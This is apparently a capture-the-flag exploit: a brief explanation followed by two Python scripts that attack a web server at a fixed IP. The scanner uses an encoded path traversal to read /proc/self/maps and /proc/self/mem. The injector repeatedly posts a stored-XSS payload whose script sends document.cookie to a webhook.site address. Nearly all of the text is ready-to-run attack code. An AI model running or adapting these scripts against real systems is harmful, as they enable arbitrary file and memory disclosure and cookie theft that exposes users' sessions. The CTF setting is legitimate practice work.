We can store the payload in the username field (or any other value the server keeps around) and then locate it by reading `/proc/self/mem` through the path-traversal file read. Run both scripts at the same time: one keeps injecting the payload, the other scans the process heap for it. Because we are reading live process memory, some of the links the scanner prints may already be stale (the allocation freed or reused) by the time they are opened.
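#!/usr/bin/env python3
"""Scanner half of the exploit: locate the injected payload in the target's memory.

The target exposes a file read through an encoded path traversal with a byte range
(``/<traversal>/<path>/<start>/<end>``).  This script uses it to read
``/proc/self/maps`` to find the ``[heap]`` mapping, then pages through
``/proc/self/mem`` looking for the payload the companion injector keeps posting,
printing a link to the bytes around each hit and dumping any chunk that contains
the flag marker.

Run it side by side with the injector.  Offsets refer to live memory, so a printed
link may already be stale when it is opened.
"""
import sys

import requests

# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'

# %2f-encoded "/../" segments; presumably decoded after routing so the traversal
# survives the framework's path normalisation -- not verified here.
TRAVERSAL = "%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"
MAPS_PATH = f"{TRAVERSAL}proc%2fself%2fmaps"
MEM_PATH = f"{TRAVERSAL}proc%2fself%2fmem"

# Must match the injector's payload byte-for-byte; replace XXXX with your own
# webhook.site token before running.
payload = 'jeeezjeeez<img src="https://webhook.site/XXXX?worked=1"><script>fetch("https://webhook.site/XXXX",{method:"POST",body:document.cookie,mode:"no-cors"})</script>'
FLAG_MARKER = b'LINECTF'

MAPS_CHUNK = 1000         # bytes of /proc/self/maps fetched per request
MAPS_CHUNKS = 5           # 5 KiB of maps is enough to reach the [heap] line
MAPS_PREFIX_LEN = 56      # response bytes preceding the file data (server wrapper; assumed constant)
MEM_CHUNK = 1024 * 256    # bytes of /proc/self/mem fetched per request
FIRST_MEM_CHUNK = 13      # low heap chunks never held the payload in practice; skip them


def read_range(path: str, start: int, end: int) -> bytes:
    """Fetch bytes [start, end) of *path* via the traversal endpoint; returns the raw body.

    Raw bytes are used deliberately: ``Response.text`` would decode the memory
    dump as UTF-8, and a character index into that text is not a byte offset.
    """
    resp = requests.get(f"{target}/{path}/{start}/{end}")
    return resp.content


def parse_heap_range(maps_text: str) -> tuple[int, int] | None:
    """Return ``(start, end)`` of the ``[heap]`` mapping from /proc/self/maps text.

    Returns ``None`` when no line mentions ``heap``.  If several do, the last one
    wins, matching the original scanner.
    """
    found = None
    for line in maps_text.split("\n"):
        if "heap" in line:
            lo, hi = line.split(" ")[0].split("-")
            found = (int(lo, 16), int(hi, 16))
    return found


def find_heap() -> tuple[int, int] | None:
    """Read the first MAPS_CHUNKS * MAPS_CHUNK bytes of /proc/self/maps and locate the heap."""
    pieces = [
        read_range(MAPS_PATH, MAPS_CHUNK * i, MAPS_CHUNK * (i + 1))[MAPS_PREFIX_LEN:]
        for i in range(MAPS_CHUNKS)
    ]
    return parse_heap_range(b"".join(pieces).decode("utf-8", "replace"))


def scan_heap(heapbase: int, heapend: int, needle: bytes) -> None:
    """Page through the heap once; print a link for each payload hit and dump any flag chunk.

    Consecutive reads overlap by ``len(needle)`` bytes so a payload that straddles
    a chunk boundary is not missed.
    """
    n_chunks = (heapend - heapbase) // MEM_CHUNK + 1
    for i in range(FIRST_MEM_CHUNK, n_chunks):
        start = heapbase + i * MEM_CHUNK
        data = read_range(MEM_PATH, start, start + MEM_CHUNK + len(needle))
        hit = data.find(needle)
        if hit != -1:
            q = start + hit
            # NOTE(review): the maps read strips MAPS_PREFIX_LEN bytes of response
            # wrapper but this offset does not; if the mem endpoint returns the same
            # wrapper, q is that many bytes too high -- verify against the server.
            print(i, f"{target}/{MEM_PATH}/{q}/{q + 1000}")
        if FLAG_MARKER in data:
            print(data.decode("utf-8", "replace"))


def main() -> int:
    """Locate the heap, then scan it repeatedly until interrupted or a request fails."""
    heap = find_heap()
    if heap is None:
        print("no [heap] line found in /proc/self/maps", file=sys.stderr)
        return 1
    heapbase, heapend = heap
    needle = payload.encode()
    try:
        while True:
            scan_heap(heapbase, heapend, needle)
            print('NO')
    except KeyboardInterrupt:
        return 130
    except requests.RequestException as exc:
        # Report instead of swallowing: a silent exit made failed runs indistinguishable
        # from "scanned everything, found nothing".
        print(f"request failed: {exc}", file=sys.stderr)
        return 1


if __name__ == "__main__":
    sys.exit(main())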
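#!/usr/bin/env python3
"""Injector half of the exploit: keep posting the XSS payload as the username.

Each POST makes the server handle the payload string, so it sits in the process
heap for a while; the companion scanner reads /proc/self/mem looking for it.
Runs until interrupted.
"""
import sys
import time

import requests

target = 'http://35.243.100.112'
# Must match the scanner's payload byte-for-byte; replace XXXX with your own
# webhook.site token before running.
payload = 'jeeezjeeez<img src="https://webhook.site/XXXX?worked=1"><script>fetch("https://webhook.site/XXXX",{method:"POST",body:document.cookie,mode:"no-cors"})</script>'

IDENTIFY_URL = f"{target}/identify"
HEADERS = {'content-type': 'application/x-www-form-urlencoded'}
# The body is sent as a raw string rather than a form dict on purpose: a dict would
# be percent-encoded by requests, and the scanner searches memory for these exact
# bytes.  This only works because the payload contains no '&', '+' or '%'.
BODY = 'username=' + payload
RETRY_DELAY = 1.0  # seconds to back off after a failed request


def inject_forever() -> None:
    """POST the payload in a tight loop; a transient request error does not stop it."""
    while True:
        try:
            requests.post(IDENTIFY_URL, headers=HEADERS, data=BODY)
        except requests.RequestException as exc:
            print(f"request failed, retrying: {exc}", file=sys.stderr)
            time.sleep(RETRY_DELAY)


if __name__ == "__main__":
    try:
        inject_forever()
    except KeyboardInterrupt:
        pass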